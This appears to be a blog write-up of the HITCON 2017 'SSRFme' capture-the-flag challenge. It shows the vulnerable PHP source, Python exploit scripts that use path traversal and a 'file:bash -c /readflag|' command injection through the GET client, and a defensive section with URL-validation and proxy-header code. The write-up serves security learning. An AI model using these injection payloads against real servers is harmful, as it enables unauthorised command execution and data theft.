[HITCON 2017]SSRFme

Challenge source

(The page first echoes the visitor's IP, here 122.192.27.100, and then highlights its own source.)

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"])); // strip dots from the dirname part of filename to block directory traversal
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

Flow
The sandbox directory is md5("orange" . "122.192.27.100").
The url parameter is handed to the GET command and run through shell_exec.
The output of shell_exec is written to the file named by the filename parameter.
Script from https://momomoxiaoxi.com/2017/11/08/HITCON/

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = '../../../../../'
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp)) # run the command first, writing its output into data
r = requests.get(url+see) # read back the data file
print(r.text)

<HTML>
<HEAD>
<TITLE>Directory ../../../../../</TITLE>
<BASE HREF="file:../../../../../">
</HEAD>
<BODY>
<H1>Directory listing of ../../../../../</H1>
<UL>
<LI><A HREF="./">./</A>
<LI><A HREF="../">../</A>
<LI><A HREF=".dockerenv">.dockerenv</A>
<LI><A HREF="bin/">bin/</A>
<LI><A HREF="boot/">boot/</A>
<LI><A HREF="dev/">dev/</A>
<LI><A HREF="etc/">etc/</A>
<LI><A HREF="flag">flag</A>
<LI><A HREF="home/">home/</A>
<LI><A HREF="lib/">lib/</A>
<LI><A HREF="lib64/">lib64/</A>
<LI><A HREF="media/">media/</A>
<LI><A HREF="mnt/">mnt/</A>
<LI><A HREF="opt/">opt/</A>
<LI><A HREF="proc/">proc/</A>
<LI><A HREF="readflag">readflag</A>
<LI><A HREF="root/">root/</A>
<LI><A HREF="run/">run/</A>
<LI><A HREF="sbin/">sbin/</A>
<LI><A HREF="srv/">srv/</A>
<LI><A HREF="start.sh">start.sh</A>
<LI><A HREF="sys/">sys/</A>
<LI><A HREF="tmp/">tmp/</A>
<LI><A HREF="usr/">usr/</A>
<LI><A HREF="var/">var/</A>
</UL>
</BODY>
</HTML>

Download the readflag binary and analyze it in IDA64; press F5 straight away after loading it.

Use readflag to read the flag
Here bash -c readflag is used, which is equivalent to ./readflag
Image from https://blog.csdn.net/SopRomeo/article/details/106013885

#coding:utf-8
import requests

url = 'http://e7e08002-933b-4f2b-800e-6e037d24f219.node3.buuoj.cn/'
exp = 'file:bash -c /readflag|' # without the pipe character the file does not seem to get created
payload = "?url={}&filename=data"
see = 'sandbox/8691d1e19ffb25eb708c66f165c8283c/data'

r = requests.get(url = url+payload.format(exp))
r = requests.get(url+see)
print(r.text)
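As an added defensive note, not part of the original writeup: the exploit chains two weaknesses in the challenge code. The url parameter reaches the libwww-perl GET client unfiltered, and that client accepts file: URLs and, through Perl's two-argument open(), treats a trailing | as a pipe to a command (escapeshellarg only protects the shell argument, not what GET does with it afterwards). Separately, X-Forwarded-For is trusted from any client, so the sandbox directory is chosen by the attacker. The Python below is written here for illustration (helper names check_fetch_url and client_ip are hypothetical, not from the challenge) and shows the checks a server-side fetcher should apply before handing a URL to such a client, plus how to honour X-Forwarded-For only when the request arrives from a trusted proxy.

```python
import ipaddress
from typing import Iterable, Tuple
from urllib.parse import urlsplit

# Only these schemes may be fetched; file:, gopher:, dict: and scheme-less
# paths such as ../../../ are rejected.
ALLOWED_SCHEMES = {"http", "https"}

# Characters a URL must never contain when the fetcher is spawned via a
# shell or uses Perl-style open(); a trailing "|" is what turned GET's
# file: handler into command execution in this challenge.
FORBIDDEN_CHARS = set("|`$;&\n\r\0")


def check_fetch_url(url: str) -> Tuple[bool, str]:
    """Return (ok, reason) for a user-supplied URL destined for a fetcher."""
    if any(c in FORBIDDEN_CHARS for c in url):
        return False, "forbidden character in url"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: " + (scheme or "(none)")
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname rather than a literal address: passes this static check.
        # (Resolve it and re-check the resulting address before connecting.)
        return True, "ok"
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
        return False, "address not allowed: " + str(addr)
    return True, "ok"


def client_ip(remote_addr: str, xff: str, trusted_proxies: Iterable[str]) -> str:
    """Pick the client address without trusting an arbitrary X-Forwarded-For.

    The header is honoured only if the TCP peer is a trusted proxy, and the
    rightmost hop that was not appended by a trusted proxy is the client.
    """
    trusted = set(trusted_proxies)
    if remote_addr not in trusted or not xff:
        return remote_addr
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted:
            return hop
    return remote_addr


if __name__ == "__main__":
    # Constructed sample inputs, including the two url values from the writeup.
    for candidate in ("http://example.com/index.html",
                      "../../../../../",
                      "file:bash -c /readflag|",
                      "http://127.0.0.1/",
                      "http://169.254.169.254/latest/"):
        print(candidate, "->", check_fetch_url(candidate))
    # Peer is the trusted proxy 10.0.0.5, so the header is used.
    print(client_ip("10.0.0.5", "198.51.100.9, 10.0.0.5", {"10.0.0.5"}))
    # Peer is not a trusted proxy, so a spoofed header is ignored.
    print(client_ip("203.0.113.7", "198.51.100.9", {"10.0.0.5"}))
```

check_fetch_url is a static pre-check only: a hostname that resolves to an internal address (or rebinds between check and connect) still has to be caught by resolving it and validating the resulting address in the same code path that opens the connection.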
posted @ 2020-09-16 19:18  山野村夫z1